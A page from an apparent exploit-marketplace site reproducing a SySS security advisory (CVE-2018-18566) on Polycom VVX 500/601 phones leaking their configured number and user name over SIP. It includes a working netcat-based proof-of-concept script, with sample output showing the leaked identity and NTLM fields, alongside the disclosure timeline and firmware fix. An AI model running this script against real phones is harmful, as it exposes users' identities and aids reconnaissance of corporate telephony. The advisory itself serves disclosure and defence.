0day.today - Dunyanin En Buyuk Exploit Veritabani
![](/img/logo_green.jpg)
Biz sadece bir adet ana domain kullaniyoruz DOMAIN_LINK
Eger exploit satin alacaksaniz ve ya hizmet icin odeme yapacaksaniz, altin almaniz gerekmekte. Biz sitemizi hack amacli kullanmak istemiyoruz, yani her turlu dogru olmayan, kanunsuz ve illegal yapilan eylemler diger hesaplari olumsuz yonde etkileyebilir ve sonrasinda buna yol acan/lar, web sitelerimize ve verilere erisimi tamamen kesilir, banlanir ve hesabini tarafimizca yok edilir.
Sadece bu sitenin yonetimine itibar edin. Sahtelere Dikkat!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Oku [ anlasma ]
- Oku [ Gonder ] kurallar
- Ziyaret et [ SSS ] page
- [ Uye Ol ] profil
- [ FIYAT ]
- Eger istiyorsaniz [ satmak ]
- Eger istiyorsaniz [ almak ]
- Eger kaybederseniz [ Hesap ]
- Herhangi bir sorunuz [ [email protected] ]
- Yetkili sayfa
- Uyelik sayfasi
- Hesap sayfasini geri yukle
- SSS sayfasi
- Iletisim sayfasi
- Paylasim kurallari
- Anlasma sayfasi
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Bize ulasabilirsiniz:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Polycom VVX 500 / VVX 601 5.8.0.12848 Information Exposure Vulnerability
Yazar
Risk
![](/img/risk/critlow_2.gif)
Security Risk Medium
]0day-ID
Kategori
Eklenme Tarihi
CVE
Platform
Polycom VVX 500 / VVX 601 5.8.0.12848 Information Exposure Vulnerability Product: VVX 500 / VVX 601 Manufacturer: Polycom Affected Version(s): <= 5.8.0.12848 Tested Version(s): 5.4.0.10182, 5.8.0.12848 Vulnerability Type: Information Exposure (CWE-200) Risk Level: Low Solution Status: Open Manufacturer Notification: 2018-08-29 Solution Date: 20??-??-?? Public Disclosure: 2018-10-23 CVE Reference: CVE-2018-18566 Authors of Advisory: Micha Borrmann (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: If a Polycom VVX 500/601 [1] is used with an on-premise installation with Skype for Business, the phone leaks the configured phone number and the name to unauthorized clients via SIP. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The phone has a SIP service running by default on TCP port 5060. This service can be abused to leak information about the configuration of the phone. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Script getdatafrompolycom.sh #!/bin/sh # Micha Borrmann <[email protected]> OWNIP=192.168.100.102 if [ -z "$1" ] then echo "Please enter an IPv4 address as target" exit else TARGET=$1 fi echo 'OPTIONS sip:dummy SIP/2.0 Via: SIP/2.0/TCP '$OWNIP':5060 To: <sip:'$OWNIP':5060> From: <sip:127.0.0.1:5060> Call-ID: 1 CSeq: 1 OPTIONS Contact: <sip:127.0.0.1:5060> Accept: application/sdp Content-Length: 0 ' | recode ..ibmpc | netcat -w 1 $TARGET 5060 Start the script against a phone and see the result: $ ./getpolycom.sh 192.168.100.101 SIP/2.0 200 OK Via: SIP/2.0/TCP 192.168.100.102:5060 From: <sip:127.0.0.1:5060> To: "Micha Borrmann" <sip:192.168.100.102:5060>;tag=F75D6627-FE135FAE CSeq: 1 OPTIONS Call-ID: 1 Contact: <sip:[email protected];opaque=user:epid:XYZ...;abcd> Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,INFO,MESSAGE,SUBSCRIBE,NOTIFY,PRACK,UPDATE,REFER Supported: replaces,100rel User-Agent: Polycom/5.8.0.12848 PolycomVVX-VVX_601-UA/5.8.0.12848 Accept-Language: en P-Preferred-Identity: "Micha Borrmann" <sip:[email protected]>,<tel:+49XYZ334455661234;ext=1234> Accept: application/sdp,text/plain,message/sipfrag,application/dialog-info+xml Accept-Encoding: identity Supported: 100rel,replaces,norefersub,sdp-anat Authorization: NTLM qop="auth", realm="SIP Communications Service", opaque="1234CAFE", crand="cafe1234", cnum="11", targetname="server.example.com", response="0000000000000000000000000001" Content-Length: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Install the new firmware which has disabled the SIP service by default. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2018-08-13: Detection of the vulnerability 2018-08-29: Vulnerability reported to manufacturer 2018-10-22: CVE number assigned 2018-10-23: Public release of the security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product web sites for the phones https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx500.html https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx601.html [2] SySS Security Advisory SYSS-2018-028 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-028.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ # 0day.today [2024-07-02] #